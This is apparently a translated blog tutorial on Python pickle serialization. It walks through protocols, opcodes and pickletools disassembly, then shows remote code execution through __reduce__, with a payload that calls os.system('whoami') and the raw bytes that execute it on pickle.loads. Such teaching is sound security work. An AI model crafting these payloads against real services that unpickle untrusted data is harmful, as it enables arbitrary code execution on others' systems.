Python Deserialization

怪小生失了神

Last modified: 2022-08-23 17:18:41

First published: 2022-07-31 16:52:49

Article link: https://blog.csdn.net/qq_61209261/article/details/126085518

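What is Python deserialization

Python deserialization is similar to PHP deserialization. Serialization converts variables, dictionaries, object instances, and other values produced while a program runs into a byte string that can be stored; deserialization later reads that byte string back and restores the state that was saved.

Python 2 has two main serialization libraries, pickle and cPickle, which differ only in speed (cPickle is implemented in C). In Python 3 there is only pickle, which uses its C implementation automatically when it is available.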

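Python deserialization vulnerabilities

Introduction to pickle

Serialization: pickle.dumps() serializes an object into a byte string (bytes), and pickle.dump() serializes an object and writes the result to a file.

Deserialization: pickle.loads() deserializes a byte string back into an object, and pickle.load() reads the data from a file and deserializes it.

dumps() and dump() accept a protocol parameter that selects the protocol version. loads() and load() take no such parameter, because the protocol is detected from the data itself.

There are six protocol versions, 0 to 5, and the default differs between Python versions. Protocol 0 is the most human-readable; later versions add non-printable bytes for efficiency.

The protocols are backward compatible: a newer Python can still load data written with an older protocol, so protocol 0 data can be used directly.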
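As a rough illustration of the points above, the sketch below pickles the same list with every protocol the running interpreter supports and loads each result back without telling loads() which protocol was used. The variable names are chosen only for this example.

```python
import pickle

a_list = ['a', 'b', 'c']

# Serialize with each available protocol; loads() detects the protocol itself.
pickled = {}
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
    data = pickle.dumps(a_list, protocol=protocol)
    pickled[protocol] = data
    print(protocol, data, pickle.loads(data) == a_list)

print("default protocol of this interpreter:", pickle.DEFAULT_PROTOCOL)
```

The protocol 0 bytes consist of printable ASCII and newlines, while protocol 2 and later begin with the PROTO opcode \x80 followed by the version number.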

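pickle is effectively a stack-based language. It can be written in several ways, and hand-written pickles usually use the protocol 0 form. When loading, Python automatically recognizes which form the incoming data uses.

Unlike conventional languages with variables and functions, a stack language like pickle has no concept of a "variable name", which can make it hard to follow. While a pickle runs, its data lives in two places:

·stack: the stack

·memo: an indexed store (a dict in the pure-Python implementation) that keeps objects for later reuse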
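To make the stack and the memo more concrete, here is a small hand-written protocol 0 pickle. The byte string is a made-up example for illustration, not something taken from a real program; each opcode is explained in the comments.

```python
import pickle

# Hand-written protocol 0 pickle (illustrative only):
#   (      MARK: push a mark onto the stack
#   Vx     UNICODE: push the string 'x' (argument ends at the newline)
#   p0     PUT: store the stack top in memo slot 0
#   g0     GET: push the object in memo slot 0 onto the stack again
#   l      LIST: build a list from everything above the mark
#   .      STOP: pop the result and finish
handwritten = b"(Vx\np0\ng0\nl."

result = pickle.loads(handwritten)
print(result)
```

The string is pushed once directly and once through the memo, so the resulting list holds 'x' twice. The memo plays the role that a variable would play in a conventional language.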

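Commonly used pickle functions:

import pickle
 
a_list = ['a','b','c']
 
# dumps(): serialize an object to bytes
a_list_pickle = pickle.dumps(a_list,protocol=0)
print(a_list_pickle)
 
# loads(): deserialize an object from bytes
print(pickle.loads(a_list_pickle))
# load(): deserialize from an open binary file, e.g. pickle.load(f)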
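The file-based pair dump()/load() works the same way as dumps()/loads(). The sketch below uses an in-memory io.BytesIO buffer as a stand-in for a real file opened in binary mode, which is an assumption made only to keep the example self-contained.

```python
import io
import pickle

a_list = ['a', 'b', 'c']

# dump() writes the serialized bytes to a file-like object.
buffer = io.BytesIO()
pickle.dump(a_list, buffer, protocol=0)

# Rewind and read the object back with load().
buffer.seek(0)
restored = pickle.load(buffer)
print(restored)
```

With a real file, the buffer would be replaced by open(path, "wb") for dump() and open(path, "rb") for load().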

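Analysis of the deserialization process

Before hunting for deserialization vulnerabilities, we need to understand how Python deserialization actually proceeds.

Analyzing the serialized byte string directly is fairly difficult, so we can use pickletools to help.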

import pickle
import pickletools
 
a_list = ['a','b','c']
 
a_list_pickle = pickle.dumps(a_list,protocol=0)
print(a_list_pickle)
# Optimize an already-pickled byte string (drops unused PUT opcodes)
a_list_pickle = pickletools.optimize(a_list_pickle)
print(a_list_pickle)
# Disassemble an already-pickled byte string
pickletools.dis(a_list_pickle)

The opcodes are listed below (see pickle.py and pickletools.py for more detail):

MARK           = b'('   # push special markobject on stack
STOP           = b'.'   # every pickle ends with STOP
POP            = b'0'   # discard topmost stack item
POP_MARK       = b'1'   # discard stack top through topmost markobject
DUP            = b'2'   # duplicate top stack item
FLOAT          = b'F'   # push float object; decimal string argument
INT            = b'I'   # push integer or bool; decimal string argument
BININT         = b'J'   # push four-byte signed int
BININT1        = b'K'   # push 1-byte unsigned int
LONG           = b'L'   # push long; decimal string argument
BININT2        = b'M'   # push 2-byte unsigned int
NONE           = b'N'   # push None
PERSID         = b'P'   # push persistent object; id is taken from string arg
BINPERSID      = b'Q'   #  "       "         "  ;  "  "   "     "  stack
REDUCE         = b'R'   # apply callable to argtuple, both on stack
STRING         = b'S'   # push string; NL-terminated string argument
BINSTRING      = b'T'   # push string; counted binary string argument
SHORT_BINSTRING= b'U'   #  "     "   ;    "      "       "      " < 256 bytes
UNICODE        = b'V'   # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE     = b'X'   #   "     "       "  ; counted UTF-8 string argument
APPEND         = b'a'   # append stack top to list below it
BUILD          = b'b'   # call __setstate__ or __dict__.update()
GLOBAL         = b'c'   # push self.find_class(modname, name); 2 string args
DICT           = b'd'   # build a dict from stack items
EMPTY_DICT     = b'}'   # push empty dict
APPENDS        = b'e'   # extend list on stack by topmost stack slice
GET            = b'g'   # push item from memo on stack; index is string arg
BINGET         = b'h'   #   "    "    "    "   "   "  ;   "    " 1-byte arg
INST           = b'i'   # build & push class instance
LONG_BINGET    = b'j'   # push item from memo on stack; index is 4-byte arg
LIST           = b'l'   # build list from topmost stack items
EMPTY_LIST     = b']'   # push empty list
OBJ            = b'o'   # build & push class instance
PUT            = b'p'   # store stack top in memo; index is string arg
BINPUT         = b'q'   #   "     "    "   "   " ;   "    " 1-byte arg
LONG_BINPUT    = b'r'   #   "     "    "   "   " ;   "    " 4-byte arg
SETITEM        = b's'   # add key+value pair to dict
TUPLE          = b't'   # build tuple from topmost stack items
EMPTY_TUPLE    = b')'   # push empty tuple
SETITEMS       = b'u'   # modify dict by adding topmost key+value pairs
BINFLOAT       = b'G'   # push float; arg is 8-byte float encoding
TRUE           = b'I01\n'  # not an opcode; see INT docs in pickletools.py
FALSE          = b'I00\n'  # not an opcode; see INT docs in pickletools.py

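Reading the disassembly

The output below is for the same list pickled with protocol 3 and then optimized (the bytes start with \x80\x03):

b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'
    0: \x80 PROTO      3	# declares the protocol version
    2: ]    EMPTY_LIST	# push an empty list onto the stack
    3: (    MARK	# push a mark onto the stack
    4: X        BINUNICODE 'a'	# push a Unicode string
   10: X        BINUNICODE 'b'
   16: X        BINUNICODE 'c'
   22: e        APPENDS    (MARK at 3)	# append everything after the MARK at offset 3 to the list
   # pop the top of the stack as the result and stop
   23: .    STOP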
highest protocol among opcodes = 2
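The walk-through above can be replayed with a toy interpreter. This is only a sketch: run_tiny_vm and MARK are names invented here, it handles just the handful of opcodes in this one pickle, and it uses pickletools.genops to split the bytes into opcodes rather than parsing them by hand. The real Unpickler does far more.

```python
import pickle
import pickletools

# Optimized protocol 3 pickle of ['a', 'b', 'c'], copied from the disassembly above.
data = b'\x80\x03](X\x01\x00\x00\x00aX\x01\x00\x00\x00bX\x01\x00\x00\x00ce.'

MARK = object()  # stand-in for pickle's internal mark object


def run_tiny_vm(pickled):
    """Execute only the few opcodes that appear in `data`."""
    stack = []
    for opcode, arg, pos in pickletools.genops(pickled):
        name = opcode.name
        if name == "PROTO":
            continue                      # version header, nothing to do
        elif name == "EMPTY_LIST":
            stack.append([])
        elif name == "MARK":
            stack.append(MARK)
        elif name == "BINUNICODE":
            stack.append(arg)             # genops already decoded the string
        elif name == "APPENDS":
            # Find the topmost mark, take everything above it, drop both,
            # then extend the list that sits just below the mark.
            mark_index = max(i for i, item in enumerate(stack) if item is MARK)
            items = stack[mark_index + 1:]
            del stack[mark_index:]
            stack[-1].extend(items)
        elif name == "STOP":
            return stack.pop()
        else:
            raise NotImplementedError(name)


result = run_tiny_vm(data)
print(result, result == pickle.loads(data))
```

The toy interpreter and pickle.loads() arrive at the same list, which shows that the disassembly really is a complete description of what the unpickler does for this input.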

Another example

import pickle
import pickletools
 
class a_class():
    def __init__(self):
        self.age = 2021
        self.name = "tmx"
        self.list = ["donot","giveme","hope"]
a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# Optimize an already-pickled byte string; the optimized copy is kept separately,
# and the original is printed and disassembled so the BINPUT opcodes stay visible
a_class_pickle_optimized = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# Disassemble an already-pickled byte string
pickletools.dis(a_class_pickle)

b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
b'\x80\x03c__main__\na_class\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03M\xe5\x07X\x04\x00\x00\x00nameq\x04X\x03\x00\x00\x00tmxq\x05X\x04\x00\x00\x00listq\x06]q\x07(X\x05\x00\x00\x00donotq\x08X\x06\x00\x00\x00givemeq\tX\x04\x00\x00\x00hopeq\neub.'
    0: \x80 PROTO      3
#    push self.find_class(modname, name); reads two consecutive strings as arguments, each terminated by \n
    # Here that is self.find_class('__main__', 'a_class')
    # Note that find_class differs between Python versions
    2: c    GLOBAL     '__main__ a_class'
   20: q    BINPUT     0
#    push an empty tuple onto the stack
   22: )    EMPTY_TUPLE
#    Roughly: the stack before this opcode should hold a class (from the GLOBAL at offset 2) followed by a tuple (the EMPTY_TUPLE pushed at offset 22); it calls cls.__new__(cls, *args), i.e. creates an instance using the tuple as arguments (the tuple is empty here)
   23: \x81 NEWOBJ
   24: q    BINPUT     1
#    push a new dict
   26: }    EMPTY_DICT
   27: q    BINPUT     2
#    a mark
   29: (    MARK
#    push a Unicode string
   30: X        BINUNICODE 'age'
   38: q        BINPUT     3
   40: M        BININT2    2021
   43: X        BINUNICODE 'name'
   52: q        BINPUT     4
   54: X        BINUNICODE 'tmx'
   62: q        BINPUT     5
   64: X        BINUNICODE 'list'
   73: q        BINPUT     6
   75: ]        EMPTY_LIST
   76: q        BINPUT     7
#    a second, nested mark
   78: (        MARK
   79: X            BINUNICODE 'donot'
   89: q            BINPUT     8
   91: X            BINUNICODE 'giveme'
  102: q            BINPUT     9
  104: X            BINUNICODE 'hope'
  113: q            BINPUT     10
#   append the values after the MARK at offset 78 to the list from offset 75
  115: e            APPENDS    (MARK at 78)
#   Roughly: add any number of key/value pairs to an existing dict
#   Stack before:  ... pydict markobject key_1 value_1 ... key_n value_n
#   Stack after:   ... pydict
  116: u        SETITEMS   (MARK at 29)
#   finish building the object (the one created at offset 23) via __setstate__ or by updating __dict__
#   if the object has a __setstate__ method, call anyobject.__setstate__(argument)
#   otherwise update the values with anyobject.__dict__.update(argument)
#   note that this can overwrite existing attributes
  117: b    BUILD
#   pop the top of the stack as the result and stop
  118: .    STOP
highest protocol among opcodes = 2
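The GLOBAL, NEWOBJ, SETITEMS and BUILD sequence can also be written by hand. The sketch below is an assumption-laden stand-in for the a_class example: it targets the standard-library class types.SimpleNamespace (chosen only because it is importable everywhere and has a __dict__), and the payload bytes are invented for illustration.

```python
import pickle

# Hand-written pickle (illustrative payload):
#   ctypes\nSimpleNamespace\n   GLOBAL: push the class types.SimpleNamespace
#   )                           EMPTY_TUPLE: push ()
#   \x81                        NEWOBJ: call cls.__new__(cls), __init__ is not run
#   }                           EMPTY_DICT: push {}
#   (                           MARK
#   Vage\n  I2021\n             push the key 'age' and the value 2021
#   u                           SETITEMS: store the pair in the dict
#   b                           BUILD: no __setstate__, so update obj.__dict__
#   .                           STOP
handwritten = b"ctypes\nSimpleNamespace\n)\x81}(Vage\nI2021\nub."

obj = pickle.loads(handwritten)
print(obj)
```

Every attribute on the restored object comes from the dict carried in the byte string, which is why BUILD lets whoever controls the pickle set or overwrite attributes freely.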

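Vulnerability analysis

RCE: the commonly used __reduce__

Most pickle deserialization challenges in CTFs are exploited through __reduce__.

When an object is pickled, the callable and argument tuple returned by its __reduce__ are written out, followed by the R opcode; on unpickling, R calls that callable with those arguments.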

# pickletools.py, line 1955 (the exact line number depends on the Python version)
name='REDUCE',
      code='R',
      arg=None,
      stack_before=[anyobject, anyobject],
      stack_after=[anyobject],
      proto=0,
      doc="""Push an object built from a callable and an argument tuple.
      The opcode is named to remind of the __reduce__() method.
      Stack before: ... callable pytuple
      Stack after:  ... callable(*pytuple)
      The callable and the argument tuple are the first two items returned
      by a __reduce__ method.  Applying the callable to the argtuple is
      supposed to reproduce the original object, or at least get it started.
      If the __reduce__ method returns a 3-tuple, the last component is an
      argument to be passed to the object's __setstate__, and then the REDUCE
      opcode is followed by code to create setstate's argument, and then a
      BUILD opcode to apply  __setstate__ to that argument.
      If not isinstance(callable, type), REDUCE complains unless the
      callable has been registered with the copyreg module's
      safe_constructors dict, or the callable has a magic
      '__safe_for_unpickling__' attribute with a true value.  I'm not sure
      why it does this, but I've sure seen this complaint often enough when
      I didn't want to <wink>.
      """

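As long as the pickled byte string contains an R opcode, the callable on the stack is invoked with the argument tuple during unpickling, regardless of whether the class in the target program defines a __reduce__ method.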
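A harmless way to watch this happen is to return a side-effect-free callable from __reduce__. In the sketch below the class name Harmless and the choice of operator.add are assumptions made for the demonstration; nothing dangerous is executed.

```python
import operator
import pickle
import pickletools


class Harmless:
    def __reduce__(self):
        # Runs at pickling time; the pickle stores this callable and its
        # arguments followed by the R opcode.
        return (operator.add, (40, 2))


payload = pickle.dumps(Harmless(), protocol=3)

# Confirm that the payload contains a REDUCE (R) opcode.
has_reduce_opcode = any(
    opcode.name == "REDUCE" for opcode, arg, pos in pickletools.genops(payload)
)

# Unpickling calls operator.add(40, 2); no Harmless instance is rebuilt.
result = pickle.loads(payload)
print(has_reduce_opcode, result)
```

The payload never mentions the Harmless class at all: it only names the callable and its arguments, which is why the loading side does not need the class or its __reduce__ method.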

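import pickle
import pickletools
 
class a_class():
    def __init__(self):
        self.age = 2021
        self.name = "tmx"
        self.list = ["donot","giveme","hope"]
    def __reduce__(self):
        # Called while pickling; R later calls os.system("whoami") while unpickling
        return (__import__('os').system, ("whoami",))

a_class_new = a_class()
a_class_pickle = pickle.dumps(a_class_new,protocol=3)
print(a_class_pickle)
# Optimize an already-pickled byte string; the optimized copy is kept separately,
# and the original is printed and disassembled so the BINPUT opcodes stay visible
a_class_pickle_optimized = pickletools.optimize(a_class_pickle)
print(a_class_pickle)
# Disassemble an already-pickled byte string
pickletools.dis(a_class_pickle)
 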
 
'''
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
    0: \x80 PROTO      3
    2: c    GLOBAL     'nt system'
   13: q    BINPUT     0
   15: X    BINUNICODE 'whoami'
   26: q    BINPUT     1
   28: \x85 TUPLE1
   29: q    BINPUT     2
   31: R    REDUCE
   32: q    BINPUT     3
   34: .    STOP
highest protocol among opcodes = 2
'''

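Take the generated payload into a normal program whose class has no __reduce__, and the command is still executed. (The payload names nt.system because it was generated on Windows; on Linux the same code produces posix.system instead.)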

import pickle
 
class a_class():
    def __init__(self):
        self.age = 2021
        self.name = "tmx"
        self.list = ["donot","giveme","hope"]

# No __reduce__ is defined here, yet loading the payload still calls nt.system("whoami")
a_class_pickle = pickle.loads(b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.')
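A payload like this can be examined without running it, because pickletools.genops only parses the bytes and never imports or calls anything. The sketch below is a simple inspection heuristic, not a sandbox; the scan function and the SUSPICIOUS set are names and choices made up for this example.

```python
import pickletools

# The payload from the example above; it is only parsed here, never loaded.
payload = b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'

# Opcodes that import names or call objects (an illustrative selection).
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
              "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


def scan(data):
    """Return (offset, opcode name, argument) for each suspicious opcode."""
    findings = []
    for opcode, arg, pos in pickletools.genops(data):
        if opcode.name in SUSPICIOUS:
            findings.append((pos, opcode.name, arg))
    return findings


findings = scan(payload)
for pos, name, arg in findings:
    print(pos, name, arg)
```

For this payload the scan reports the GLOBAL at offset 2 that names nt system and the REDUCE at offset 31, matching the disassembly shown earlier.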

That's it for now.